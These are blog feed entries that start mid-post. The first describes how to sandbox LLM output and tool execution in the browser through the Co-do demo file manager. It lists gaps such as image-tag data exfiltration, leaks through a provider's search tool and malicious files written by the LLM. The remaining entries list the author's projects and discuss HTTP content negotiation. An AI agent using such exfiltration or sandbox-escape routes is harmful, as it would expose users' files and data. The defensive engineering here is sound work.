</span></span></code></pre></div><p>The inner iframe will display the content and should have no ability to communicate with the host iframe. There are a number of issues with the above example:</p>
<ol>
<li>The very restrictive inner sandbox is isolated onto another origin and as such we can&rsquo;t get access to the container size, so it&rsquo;s hard to build good-looking UI. There might be a way to expand it to <code>allow-same-origin</code> but you have to deal with the trade-offs.</li>
<li>This is still hard to manage. You have to ensure that the data included in the inner <code>srcdoc</code> is properly escaped so it doesn&rsquo;t break out of the attribute string if you encode it straight from a server.</li>
<li>The double-iframe is also incredibly wasteful. It&rsquo;s essentially loading two full DOMs (which are already heavy) every time we embed untrusted content.</li>
</ol>
<h3 id="improving-the-iframe-sandbox">Improving the iframe sandbox</h3>
<p>The iframe is the only renderer sandbox we have, and I think there are a number of improvements browsers should make:</p>
<ul>
<li>All browsers should ship the <code>csp</code> attribute and let the embedder refine and further restrict access to the network.</li>
<li>I&rsquo;m not confident that CSP alone prevents all network access. The Beacon API might appear to queue a message. While <code>connect-src</code> should strictly block beacons, edge cases in implementation can be tricky. Similarly, what happens with DNS lookups? A quick dump of the network traffic in Chrome via <code>chrome://net-export/</code> seems to show no network access, but I believe this area deserves more rigorous stress-testing.</li>
<li>We need a way to size the outer-iframe (or iframes in general) that doesn&rsquo;t rely on access to <code>iframe.contentDocument.body.innerHeight</code> and <code>sandbox='allow-same-origin'</code>. This constraint means that we have to fully untrust any JS that might be rendered in the inner-frame, and I think that is a shame because it would be nice to be able to have fully interactive experiences.</li>
<li>If we want to stream data into the iframe, we need <code>sandbox='allow-same-origin'</code> which gives embedded content a way to access resources that are local to the current origin (cookies etc). It would be useful to be able to stream updates to the DOM and keep them on separate origins.</li>
<li>I would like a way to reduce the overhead of iframes. If we are disabling advanced functionality, do they get loaded in the DOM? I really don&rsquo;t know about this, but having the double-iframe is doubly wasteful.</li>
</ul>
<p>There are probably more things that are needed, and I don&rsquo;t know if it will be easier to have something like a new dedicated element like <code>&lt;sandbox href&gt;</code> that is more suited to running untrusted content. Chrome did <a href="https://wicg.github.io/fenced-frame/">propose Fenced Frames</a> for the Privacy Sandbox project that solves some of these issues. It allows for passing of data between frames in a controlled way and can entirely disable network access with <code>disableUntrustedNetwork()</code>. This doesn&rsquo;t work outside of Chrome, so your options are limited.</p>
<h2 id="the-execution-environment">The execution environment</h2>
<p>We&rsquo;ve somewhat locked down the network and we feel somewhat confident that we can constrain the content coming back from the LLM. We think we have a pretty reasonable set of sandboxing options for the file system. What about execution?</p>
<p>LLMs are incredibly powerful when they have access to tools. Many of these tools are now provided as <a href="https://modelcontextprotocol.io/">MCP servers</a>, which is out of scope for this post. The tools I am talking about are developer-provided functions that the LLM can determine which is best to call.</p>
<p>It turns out we have two runtimes in the browser that allow us to run code: the JS environment that we all know and love, and the <a href="https://webassembly.org/">WebAssembly (WASM)</a> runtime. Both are designed to be able to run code from any untrusted source safely on the user&rsquo;s computer. WASM in particular is incredibly interesting because it enables us to bring decades of software from other systems and run them safely inside the browser. For example, it&rsquo;s possible to create and run a <a href="https://sqlite.org/wasm/doc/trunk/index.md">sqlite database entirely inside the browser</a> by compiling it to WASM. The WASM security model is robust, designed specifically to execute untrusted binaries safely.</p>
<p>Running untrusted code directly in the DOM, or even running code we trust with untrusted input, is incredibly risky, so the execution needs to be further sandboxed as far away as possible from our UI environment. We could maybe think about running them in an iframe as noted above; however, Web Workers let us isolate our code from the UI in both the DOM manipulation sense and the off-the-main-thread sense. Web Workers can also inherit a very strict set of CSP constraints that block network access.</p>
<h2 id="putting-it-into-practice-co-do">Putting it into practice: Co-do</h2>
<p>So how feasible is this to put into practice? Well, I built a demo.</p>
<p>Introducing <a href="http://co-do.xyz">co-do.xyz</a> [<a href="https://github.com/PaulKinlan/Co-do/">Source</a>] - a <strong><em>demo</em></strong> and an <strong><em>experiment</em></strong> (with no warranties) of everything that we&rsquo;ve talked about above.</p>
<p>Co-do is an AI-powered file manager that runs entirely in the browser. You grant it access to a folder on your machine, configure your AI provider (Anthropic, OpenAI, or Google), and ask it to help with file operations: listing files, creating documents, searching content, comparing files. It also has access to a number of pre-compiled WASM binaries for operations that you might want to perform on text files (for now, I&rsquo;m hoping to bundle <code>ffmpeg</code> later).</p>
<p><figure><img src="/images/co-do-1.png"
    alt="Co-do"><figcaption>
      <p>Co-do - asking a complex request on file data</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-start.png"
    alt="Co-do"><figcaption>
      <p>Co-do - planning</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-permission.png"
    alt="Co-do"><figcaption>
      <p>Co-do - Using a WASM tool and asking for permission  - sha256 - to hash a file</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-create.png"
    alt="Co-do"><figcaption>
      <p>Co-do - Asking for permission to create a file on the filesystem</p>
    </figcaption>
</figure>

<figure><img src="/images/co-do-final.png"
    alt="Co-do"><figcaption>
      <p>Co-do - All done - summary, new file and sha256</p>
    </figcaption>
</figure>
</p>
<p>Here is the <a href="/sandbox-summary.md">summary file</a> that was created in the screenshots.</p>
<p>It implements the layered sandboxing approach we discussed:</p>
<ol>
<li><strong>File system isolation via the File System Access API</strong> - You select a folder, and Co-do can only operate within that boundary. No reaching up to parent directories, no accessing siblings. It&rsquo;s the browser&rsquo;s chroot equivalent.</li>
<li><strong>Network lockdown via CSP</strong> - The strictest policy I could manage is to block everything and then only allow: <code>connect-src 'self' https://api.anthropic.com https://api.openai.com https://generativelanguage.googleapis.com</code>. Only the AI providers can receive your data. Image tags exfiltrating content to unknown servers should not be easy, but there&rsquo;s a world where any of these three API providers has an endpoint that could be accessible by a simple <code>GET</code>.</li>
<li><strong>LLM input guarding</strong> - The current demo will send the contents of the file to the LLM. Firstly, this might not be needed for tool calling, and secondly, you have to be confident that tools you configure on your call to the LLM won&rsquo;t leak data (for example, many APIs have a Web Search tool - is it secure? I&rsquo;m sure the providers do their best, but you need to make sure it&rsquo;s not a new vector for exfiltration).</li>
<li><strong>LLM output sandboxing</strong> - AI responses render in sandboxed iframes with <code>allow-same-origin</code> but critically not <code>allow-scripts</code>. The LLM can&rsquo;t inject executable JavaScript into the page. We can measure the content height for proper display, but any <code>&lt;script&gt;</code> tags are dead on arrival.</li>
<li><strong>Execution isolation for custom tools</strong> - Co-do supports WebAssembly custom tools that run in isolated Web Workers. Each execution gets a fresh Worker that can be truly terminated if it misbehaves (timeouts, runaway loops). The Workers inherit the CSP, so even WASM modules shouldn&rsquo;t be able to make unauthorised network requests.</li>
</ol>
<h2 id="known-gaps">Known gaps</h2>
<p>There are some gaps that everyone should be aware of:</p>
<ul>
<li><strong>You&rsquo;re still trusting the LLM provider.</strong> Your file contents get sent to Anthropic, OpenAI, or Google for processing. CSP ensures data only goes there, but &ldquo;there&rdquo; is still a third party. A fully local model would solve this, but we&rsquo;re not quite there yet for capable models in the browser.</li>
<li><strong>Malicious file creation is still possible.</strong> The LLM could create a .docx with macros, a .bat file, or a malicious script that&rsquo;s harmless in the browser but dangerous when opened by another application. The sandbox protects the browser session, not your whole system.</li>
<li><strong>The allow-same-origin trade-off.</strong> The markdown iframe needs this to calculate content height for proper display. This means I can&rsquo;t run scripts and have same-origin access without the iframe being able to escape its sandbox. I chose no scripts, but it&rsquo;s a compromise - I can&rsquo;t offer interactive rendered content.</li>
<li><strong>CSP might not block everything.</strong> I&rsquo;m reasonably confident about fetch and XHR, but what about the Beacon API queuing requests? DNS prefetch for resources? A <code>chrome://net-export/</code> dump looked clean, but I don&rsquo;t have complete certainty. More investigation needed.</li>
<li><strong>No undo.</strong> If you grant write permission and the LLM deletes a file, it&rsquo;s gone. Co-do has granular permissions (always allow, ask each time, never allow) but no backup system. The browser&rsquo;s sandbox keeps the LLM in its lane, but within that lane, destructive operations are destructive.</li>
<li><strong>Permission fatigue is real.</strong> Asking users to approve every operation is secure but annoying. Letting users blanket-allow operations is convenient but risky. I&rsquo;ve tried to find a middle ground, but the fundamental tension remains.</li>
<li><strong>Cross-browser limitations.</strong> The <code>csp</code> attribute on iframes only works in Blink-based browsers. The double-iframe technique works everywhere but it&rsquo;s wasteful and awkward. Safari&rsquo;s File System Access API support is limited (specifically, it lacks <code>showDirectoryPicker</code>, making the local folder editing workflow impossible currently).</li>
</ul>
<p><strong>This is really a Chrome demo.</strong></p>
<p>Is it perfect? No. But I think it demonstrates that the browser&rsquo;s 30-year-old security model, built for running hostile code from strangers the moment you click a link, might be better suited for agentic AI than we give it credit for. However, I do think there should be a lot more investment from browser vendors in improving the primitives for securely running generated content (be it an ad, an LLM, or any embed).</p>
]]></content:encoded></item><item><title>projects</title><link>https://aifoc.us/projects/</link><pubDate>Fri, 02 Jan 2026 19:20:54 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/projects/</guid><description>&lt;p>It’s been nearly 9 months since I started this blog and I feel that while I kept up a good pace of articles and I’ve dived deeper in to my thoughts on the intersection of web and AI (specifically LLMs), however a lot of what I’ve done is hidden away because they are the things that I&amp;rsquo;ve been building that help me test my ideas and hypothesis'.&lt;/p>
&lt;p>To set some context, I&amp;rsquo;m the manager and lead of the Chrome Developer Relations team. My day job is to help my team be successful (they are successful when they help developers build amazing websites and help the web to thrive). Up until 2024 I&amp;rsquo;d been personally very pessimistic about the health and future of the Web. The platform is competing against mobile platforms (specifically Apps) and the platforms defined by those Apps (Facebook, Instagram, TikTok) and not really succeeding. These new platforms made it even easier to share ideas and content, and the general thought was that all use of computing by the billions of people on the planet will move to these new platforms and you could see and feel this slow decline of the web.&lt;/p></description><content:encoded><![CDATA[<p>It’s been nearly 9 months since I started this blog and I feel that while I kept up a good pace of articles and I’ve dived deeper in to my thoughts on the intersection of web and AI (specifically LLMs), however a lot of what I’ve done is hidden away because they are the things that I&rsquo;ve been building that help me test my ideas and hypothesis'.</p>
<p>To set some context, I&rsquo;m the manager and lead of the Chrome Developer Relations team. My day job is to help my team be successful (they are successful when they help developers build amazing websites and help the web to thrive). Up until 2024 I&rsquo;d been personally very pessimistic about the health and future of the Web. The platform is competing against mobile platforms (specifically Apps) and the platforms defined by those Apps (Facebook, Instagram, TikTok) and not really succeeding. These new platforms made it even easier to share ideas and content, and the general thought was that all use of computing by the billions of people on the planet will move to these new platforms and you could see and feel this slow decline of the web.</p>
<p>While LLMs have enabled me to be incredibly productive both in helping me do my day job, they have revitalised my passion for the web because 1) I think it&rsquo;s the most versitile medium that we have ever seen (and will ever see), and the ability for LLMs to parse and manipulate content give us an ability to build entirely new experiences instantly for anyone with a computer and internet connection, and 2) it rekindled my love of experimenting and pushing the boundaries of what is possible on the medium that is called &ldquo;The Web&rdquo;.</p>
<p>I certainly don&rsquo;t dismiss the challenges that LLMs might also present for the medium, but I&rsquo;m also happy to work out how to tackle these while also building and pushing the capabilities of browsers.</p>
<p>This post details just some of the things that I built that I think are interesting enough to share (and that I can talk about)</p>
<p>First up, the experiments that I built to try and push on the intersection of the Web and LLMs by deeply integrating both technologies:</p>
<ul>
<li>
<p><a href="https://github.com/PaulKinlan/ai-wc">ai-wc</a> - AI Web Components. In my <a href="https://aifoc.us/elements/">elements</a> post I explored how we might add LLM technology to enhance existing elements. I&rsquo;ve got a bit of a love-hate relationship with Web Components, but the ability for them to now participate in a <code>&lt;form&gt;</code> submission is a critical enhancement and I really wish there was more exploration of web components in this context.</p>
</li>
<li>
<p><a href="https://blogcrafteditor.paulkinlan-ea.deno.net/">Blog Craft Editor</a> - I explored how to add writing assistance to an existing editor that I build just using LLM&rsquo;s. The new updated editor now has the ability to upload all of your content from a directory on your machine and use it to cross-reference existing posts finding links that I forgot, and more importantly for me to help me find gaps or connections across things that you&rsquo;ve said before. Using your existing writing as context, the tools can act as a useful critic of your ideas if you prompt the tool correctly.</p>
</li>
<li>
<p><a href="https://www.val.town/x/paulkinlan/deep-research-email">Deep Research via Email</a> - Send an email to: <code>deep-research@valtown.email</code><strong>. Subject</strong>: Your research topic (used for threading and replies). <strong>Body</strong>: Detailed research question or context. <strong>Wait</strong>: The system will process your request via Gemini DeepResearch Agent and send the research report back to your email.</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/fauxmium">Fauxmium</a> - I&rsquo;m particularly proud of this one. A fully fake internet. Inspired by the original websim project - you enter a URL and you get a website that the LLM outputs based on how the model&rsquo;s biases tend to what that URL might represent. This version is even more advanced, it starts up a real browser (Chrome for Testing) and the LLM intercepts every request and generates a response. I just run <code>npx fauxmium</code> when I need some entertainment and I browse a fake web for a couple of hours. Some neat things on this: It generates images for the page and it can also create videos. This means that you can go to a fake youtube and watch an entire infinite set of 8 second clips (the neat thing is that the video uses the generated poster art as the source). The final neat thing is that it installs a Chrome Extension to help you track the cost of your browsing&hellip;. It&rsquo;s fun that it&rsquo;s about as fast as the 90&rsquo;s internet and costs a similar amount to what my parents paid for the minutes I used on the telephone.</p>
<ul>
<li><a href="https://github.com/PaulKinlan/interceptium">Interceptium</a> - Following on from Fauxmium, I wanted to experiment with what an LLM could do if it was a different parts of the network request stack. i.e, if you can generate POST data or completely change the response. This was a pretty interesting experiment because it formed my thoughts on a completely personalised browsing experience. If I like sites to be summarized, why can&rsquo;t I as the user of the user-agent just say thats how <em>I</em> want to browse the web. There is a constant tension between site owners who want their exact intent rendered and a users&rsquo; needs and preferences. I don&rsquo;t know where I sit on this, but I do think with LLMs the web is changing under our feet and everything will be personalised soon.</li>
</ul>
</li>
<li>
<p><a href="https://flickity.val.run/">Flickity.val.run</a> - this is a fun one, as I think about personalisation I wondered if we could spruce up the new tab page in Chrome on Mobile and instead of just showing a list of articles, show a dynamic video like you get on TikTok. The quality is not yet there (the coherence of the video is not quite right when it renders what the page might look like), but it&rsquo;s very fun to watch (especially when I ask it to generate dancing TikTok videos). The process for doing this though is simple. I get a list of posts from Hackernews, I take extract the content and summarize it as a script. I take a screenshot that can be used in the video and then I use Veo3 to render a video. It lead me to <a href="https://aifoc.us/hyper-content-negotiation/">hyper-content-negotiation</a></p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/hyperlink">Hyperlink Experiment</a>: There is a lot in here&hellip;. I struggle with the hubris the industry has around the link. I set out to experiment with the concept of linking on the web and I really want to encourage people to really push the boundaries of what a link is and if possible with technologies like LLMs, Image recognition models change how the web fundamentally works.</p>
<ul>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/merge">Merge</a> - <a href="https://chromewebstore.google.com/detail/merge-link/ffpcdfloldhbeielaoiblgalmpkalnjo">Extension</a> - One of the things I love about the web is that you don&rsquo;t really know what is on the other side of a link. One of thing I dislike is that you don&rsquo;t know what is on the other side of a link. I also wonder what the intent of a link it -</li>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/memex-join">Trails</a> - <a href="https://chromewebstore.google.com/detail/trails/cmhofadlaokelmccnocbnojdbdnfjhga">Extension</a> - This uses no LLM technology, but I built it with an LLM. Vannevar Bush&rsquo;s &ldquo;User links&rdquo;, lets you create your own links on pages and have them be permanent.</li>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/summary">Summary</a> - Hover over a link and get a summary of what is on the linked page before you click it.</li>
<li><a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/stretchtext">Stretch Text</a> - Taking Ted Nelson&rsquo;s idea and trying to make it useable. Select some text and zoom in to (Expand) or Zoom out (summarize). After reading Ted Nelson&rsquo;s ideas on this, it was up to the author to offer this and knowing how I know how people publish on the web, people just aren&rsquo;t going to do this. LLM&rsquo;s make it possible to add extra context or summarize it. I didn&rsquo;t really test this too much in the end because I wanted to get Merging and Trails working.</li>
<li>I made a lot of other experiments, such as linking into images with descriptions, and also make it easy to do <a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/image-links/src">image-maps again by using english (using Segment anything model)</a> instead of points. <a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/audio-link">Link to audio content vs timestamps with a whisper-like model.</a> <a href="https://github.com/PaulKinlan/hyperlink/tree/main/packages/ui-links">Pull in the UI of a linked element</a> into the current page, taking the Merge experiment on step further.</li>
</ul>
</li>
<li>
<p><a href="https://LLMdeck.xyz">LLMdeck.xyz</a> - I really just wanted a way to see the results from a couple of models at the same time. It can use Gemini, Claude, OpenAI and Chrome&rsquo;s built-in model. Hosted on <a href="https://val.town">val.town</a> and <a href="https://www.val.town/x/paulkinlan/eval">built</a> with Townie (1 manual change to a CSS class)</p>
</li>
<li>
<p><a href="https://Makemy.blog">Makemy.blog</a> - I <a href="https://github.com/PaulKinlan/gen-site">built a full on site building platform on Deno</a>, mostly coded with an LLM. You describe the site you want and it will be generated. It does it on request vs a build step. I need to update the models it uses (for example, it generates images before Nano-banana even existed). This was really just an experiment to see if I can make it as easy as possible for non-coders to get a site online without having to engage an agency or fall back to facebook (which happens a lot here in Ruthin).</p>
</li>
<li>
<p>&lt;<a href="https://github.com/PaulKinlan/generate-html-element">generate-html</a>&gt; <a href="https://generate-html-element.paulkinlan-ea.deno.net/">Custom Element</a> - I spent some time reverse engineering how OpenAI&rsquo;s Skybridge works. I thought it was neat how they use a double iframe and the <code>sandbox</code> attribute to make it more safe to embed and interact with untrusted 3p content. So i <a href="https://generate-html-element.paulkinlan-ea.deno.net/">decided to push on</a> this and see how feasible it would be to allow LLMs to go nuts inside a custom element. Fun experiment (but it requires exposing your API key in the client so has very limited production value right now - hey, <a href="https://aifoc.us/dangerous/">API keys still need to be solved</a>)</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/reactive-prompt">reactive-prompt</a> - technically 2024, but I&rsquo;ve updated it a fair bit this year. I think an un-explored area of LLMs is reactivity, that is using a set of prompts where parts of the inputs can change and the prompt will automatically get re-run. I think this is important if we are going to build dynamic UIs that respond to user input and act in a similar way to reactive-UIs. Also as we consider workflows vs agent processes, if I know the steps we need to take and every steps is processed by an LLM (or even normal code) then being able to control this and package it up will be important.</p>
<ul>
<li><a href="https://github.com/PaulKinlan/reactive-agent">reactive-agent</a> - Built on top of <code>reactive-prompt</code> I tried to explore building agent workflows that run in response to changes in input. This model is pretty convoluted and you quickly get caught up in <code>effect()</code> overload. Fun though.</li>
<li><a href="https://github.com/PaulKinlan/f">f</a> - Inspired by my friend Dion and his post on English as <em>the</em> programming language, I wanted to test if we could built functions in the browser &ldquo;f<code>Create a UI that renders the Space Weather forecast using this schema`({someData:&quot;&quot;})</code>&rdquo;. I&rsquo;d never use this in product unless the environment was completely locked down. I do think it is a very interesting experiment that should get a lot more research.</li>
</ul>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/ssgen/blob/main/content/carousel.md">ssgen</a> - I really went all in thinking about how CMS&rsquo;s might work in the future. ssgen is a simple CMS that parses Markdown of the content and then applies intent and design (via images or text). It also has high-level concepts like custom elements that are just prompts (think <code>&lt;carousel&gt;a list of things&lt;/carousel&gt;</code> and it <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/carousel.md">just works out what to render</a>). In this demo I also pushed on the idea of every web page being personalised to the user: It knows what browser you are using so it can output very specific HTML, CSS and JS that target that version of the browser; It might know your preference via an <code>accept-preference</code> and it renders the page to <em>your</em> liking.</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/token-counter">Token counter</a> - I wanted a CLI way to quickly check how many tokens are in some text. <code>tcnt</code> is your <a href="https://www.npmjs.com/package/tcnt">answer</a>.</p>
</li>
<li>
<p><a href="https://github.com/PaulKinlan/omnibox-mcp">Omnibox-mcp</a> - I built this to showcase to the Chrome team what having MCP as a first-class citizen might look like. It&rsquo;s a Chrome extension that registers a omnibox keyword <code>@mcp</code> and when invoked will act like an agent. It was built pretty much exclusively with an LLM.</p>
</li>
</ul>
<p>I&rsquo;ve built a lot of software this year that while they don&rsquo;t push on the intersection of Web and LLMs, they are me using LLM&rsquo;s exclusively to accelerate and amplify my ability to ship products. Here&rsquo;s just a few of them:</p>
<ul>
<li><a href="https://github.com/PaulKinlan/leviroutes">LeviRoutes</a> - Untouched for over a decade, I refactored using LLMs and even published it to <a href="https://www.npmjs.com/package/leviroutes">npm</a>. I wouldn&rsquo;t have done this at all without an LLM. I use co-pilot a lot and I thought it was pretty neat that you can <a href="https://github.com/PaulKinlan/leviroutes/issues/22">get it to write reports for you too</a>.</li>
<li><a href="https://paulkinlan.github.io/HackerNewsDeck/">Hacker News Deck</a> - I really like the TweetDeck UX pattern, so I built one for <a href="https://github.com/PaulKinlan/HackerNewsDeck">Hacker News</a>. This one was almost one-shotted.</li>
<li><a href="https://github.com/PaulKinlan/ContentCrafter">Content Crafter</a> - a tool to help me and the team make social posts. I use it a lot less than I thought I would, but hey, I built it in about an hour.</li>
<li><a href="https://github.com/PaulKinlan/bluesky-poster">BlueSky poster</a> - I built this for a demo for Google IO to demonstrate Chrome&rsquo;s on-device APIs&hellip; It&rsquo;s fine, I guess.</li>
<li><a href="https://github.com/PaulKinlan/full-rss">Full RSS</a> - It annoys me that sites only do partial RSS. <a href="https://full-rss.deno.dev/">This</a> site fixes that.</li>
<li><a href="https://github.com/PaulKinlan/superduperfeeder">Superfeedr</a> clone and <a href="https://github.com/PaulKinlan/superduperfeeder-hub">hub</a> - I really needed a way to get updates from RSS feeds without polling every sitge. WebSub nee PubSubhubbub was a great solution and Superfeedr a great product (now owned by Medium) but was too pricey. I used an LLM to <a href="https://superduperfeeder.deno.dev/ui">build me the entire platform I needed</a>. I made a mistake in the first version I built where I merged the client and the hub in to one project. It took a bit longer to unstick all this, but Claude helped me a lot.</li>
<li><a href="https://github.com/PaulKinlan/ntp">NTP</a> - I just needed a simple way to customise what happens on CMD/CTRL-T,.</li>
<li><a href="https://TLDR.express">TLDR.express</a> - a site that takes a list of RSS feeds and summarises new posts to them each day. The <a href="https://github.com/PaulKinlan/RSSFeedSummary">code is pretty simple</a>, it just runs and I find it incredibly useful.</li>
<li><a href="https://posthero.us">posthero.us</a> - I <a href="https://www.val.town/x/paulkinlan/postherous">built</a> an email based blogging platform that is integrated in to the fediverse. All coded via an LLM including the ActivityPub integration (It was crazy, Val.town&rsquo;s Townie even built KeyGen tools for me to ensure that I had the correct public and private keys). It was crazy how far I got building this on a phone.</li>
<li><a href="https://sendvia.me">sendvia.me</a> - It blows my mind that I can&rsquo;t email docs and newsletters to my remarkable, I have to download them and sync them in drive. Ridiculous. Anyway, I <a href="https://github.com/PaulKinlan/send-to-remarkable">built an tool that does it</a>. It needs updating to the latest API from remarkable - big shout out to <a href="https://github.com/erikbrinkman/rmapi-js">Erik Brinkman and rmapi-js</a></li>
<li><a href="https://github.com/PaulKinlan/robots-txt-scanner">Robots.txt scanner</a> - I needed a simple tool that helps me get some stats on who blocks what in the context of AI companies. It&rsquo;s not perfect, but it got me the answer I needed.</li>
<li><a href="https://github.com/PaulKinlan/site-category">Site categoriser</a> - Similar to robots.txt, I wanted to quickly categorize the top 10k sites. Again, far from perfect but useful enough.</li>
<li><a href="https://www.val.town/x/paulkinlan/stop-dont-do-this">Stop don&rsquo;t do this</a> - Shell script generator. At somepoint I want to explore an shell entirely driven by LLMs.</li>
<li><a href="https://github.com/PaulKinlan/warpscan">Warpscan.app</a> - I <a href="https://warpscan.app/">built</a> this to make my daughter laugh. I saw a bunch of funny videos for a similar native app and just wanted something that worked well in the browser. This was built entirely with an LLM but also highlighted issues when asking it to use APIs that were not in the model (in this case the new FileSystem API). The lag between new API coming out and being in the model is alarming and presents real challenges for any new tool, and RAG just doesn&rsquo;t cut the mustard.</li>
</ul>
<p>I will aim to also keep this post updated over the coming months and years.</p>
]]></content:encoded></item><item><title>hyper content negotiation</title><link>https://aifoc.us/hyper-content-negotiation/</link><pubDate>Thu, 27 Nov 2025 11:39:28 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/hyper-content-negotiation/</guid><description>&lt;p>I fondly remember sitting with my friend Chris learning how to make HTTP requests so that we more quickly check if our web pages were rendering as we expected without the need to load the browser.&lt;/p>
&lt;p>We would use:&lt;/p>
&lt;pre tabindex="0">&lt;code>c:\telnet.exe pcbware.com 80
&lt;/code>&lt;/pre>&lt;p>Then blindly type:&lt;/p>
&lt;pre tabindex="0">&lt;code>GET /index.shtml HTTP/1.0
&lt;/code>&lt;/pre>&lt;p>The keys I typed weren&amp;rsquo;t echoed back to me, but if we got it right it would return:&lt;/p>
&lt;pre tabindex="0">&lt;code>200 OK
Content-Type: text/html
&amp;lt;! .......
&lt;/code>&lt;/pre>&lt;p>Huh. What&amp;rsquo;s Content-Type?&lt;/p></description><content:encoded><![CDATA[<p>I fondly remember sitting with my friend Chris learning how to make HTTP requests so that we more quickly check if our web pages were rendering as we expected without the need to load the browser.</p>
<p>We would use:</p>
<pre tabindex="0"><code>c:\telnet.exe pcbware.com 80
</code></pre><p>Then blindly type:</p>
<pre tabindex="0"><code>GET /index.shtml HTTP/1.0
</code></pre><p>The keys I typed weren&rsquo;t echoed back to me, but if we got it right it would return:</p>
<pre tabindex="0"><code>200 OK
Content-Type: text/html

&lt;! .......
</code></pre><p>Huh. What&rsquo;s Content-Type?</p>
<p>Content-Type: text/html has literally been in my life for the the last 25-30 years, and yet I hardly ever think about what it might offer us and how it might be one of the most critical things for the future of the web (Btw - <a href="https://http.dev/">http.dev</a> is such a good resource for all things HTTP headers).</p>
<p>When I started web development I had no concept of content-negotiation and it&rsquo;s importance - for the unintroduced, on the request to the server you could tell the server what type of content that you can <a href="https://http.dev/accept">accept</a> and the server has the option of serving any type of format back.</p>
<pre tabindex="0"><code>GET /index.html HTTP/1.1
Accept: text/html, text/plain;q=0.9, text/*;q=0.8, */*;q=0.7
</code></pre><p>:mind-blown-emoji-in-1998:</p>
<p>My version of Chrome offers this to every page that I navigate to:</p>
<pre tabindex="0"><code>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
</code></pre><p>That&rsquo;s a lot of things that can be handled by the browser. But what do we do with this data on the server?</p>
<p>Well, a lot and not a lot at the same time. CDNs make extensive use of it for things like optimizing image delivery - if you know you can send an avif to millions of users, then transcoding the image while maintaining the same quality is a huge benefit to both the CDN and to users. But for how we think about serving content optimized for the mode of interaction? I really just don&rsquo;t see it, and for good reason - you are in a browser, we expect a request to probably return HTML. Well the guidance says to prefer the highest <code>q</code>. It&rsquo;s kinda neat to see that the default request has <code>*/*</code> and a range of image formats.</p>
<p>There&rsquo;s something around this that got me thinking&hellip;</p>
<p>I&rsquo;ve been spending a fair bit of time playing and thinking about how a future Web Browser might work. As I try to understand how people are using the internet, you can see the rise of closed platforms and specifically video platforms. Ben Thompson has frequently noted that text is easy to share, <a href="https://stratechery.com/2020/the-tiktok-war/">but Video is what the majority of people consume or at least want to consume</a>. Now the web, while being the most versatile hypermedia platform the world has ever seen is dominated by text and more and more user-time is transitioning on to other platforms. It seems like a risk to me, so what if the final form for success for the web is whatever the user wants in whatever format they want?</p>
<p>I recently spent some time wondering how we might have a more of a &rsquo;lean-back&rsquo; experience in the browser, that is a simpler way to scan new content and then engage with it. A couple of years back I built a screenshot based &lsquo;TikTok&rsquo; like list of articles that I might be interested in (it used to be on Glitch RIP). Screenshots are cool and all, but with the introduction of <code>veo3</code> I thought it might be interesting to see if we can create a video out of the contents of a web page.</p>
<p><a href="http://flickity.val.run">Flickity</a> is a surprisingly fun experiment. I screenshot the url, extract the markdown and use an LLM to generate a script. The script is then passed into <code>veo3</code> and now we have a list of overviews of the pages. Yes, the videos aren&rsquo;t perfect—the text coherence is a little off—but I thought it was a neat experiment.</p>
<figure>
  <video src='/images/flickity.mp4' style="width:100%" controls></video>
  <figcaption>
    <p>Flickity Web Demo (I don&#39;t know why there&#39;s no sound in the video)</p>
  </figcaption>
</figure>
<p>Flickity just made me think a lot about the future of the web being truly a multimodal hypermedia platform that is shaped to the user&rsquo;s preference.</p>
<p>With LLMs we have the ability to convert almost any content into any form of content and I think this will be a super-power of the web and the browser. In <a href="https://aifoc.us/interception/">interception</a> I explored what it might be like for the browser to mediate and control the response from a server (for example to only every summarize the content) - it was an interesting experiment in that it shows that the web is more flexible than we take for granted, but highlights that morphing content in the client has a lot of potential issues ranging from lack of developer control all the way to breaking expectations of how JavaScript might work.</p>
<p>We are starting to see services and web apps that transform content from one form to another: NotebookLM can create podcasts, videos, interactive quizzes, mindmaps out of pages and source content. <a href="https://research.google/blog/generative-ui-a-rich-custom-visual-interactive-user-experience-for-any-prompt/">Google search has started to generate &ldquo;interactives&rdquo; inside the AI mode</a>. Why isn&rsquo;t this something the browser can just do or at least the developer can indicate support for from the server? Why not make this available to every single site on the users behalf? HTML into video. HTML into an image. Static HTML into an interactive web app&hellip; Video into article; Audio file into vide&hellip; well, anything into anything else?</p>
<p>We have 30 years of being able to negotiate the content type and we have the technology via LLMs, having the two combined might be a powerful concept for the future of the web. In <code>ssgen</code> (my <a href="https://aifoc.us/headless-stopgap/">experimental</a> &ldquo;<a href="https://github.com/PaulKinlan/ssgen">CMS</a>&rdquo;) I wanted to explore if I can offer a way to have the server return whatever preferred output format is.</p>
<p>Today, web browsers have a pretty permissive Accept header, so there&rsquo;s nothing really stopping us from returning a format that we think is appropriate. What if we introduce more the ability for servers to determine the best way to return the content?</p>
<p>If you want the page as a video, like in Flickity Web, you can:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://ssgen.paulkinlan-ea.deno.net/carousel -H <span style="color:#e6db74">&#34;Accept: video/mp4&#34;</span>
</span></span></code></pre></div><p>If you want an image representation of the experience, you can:</p>
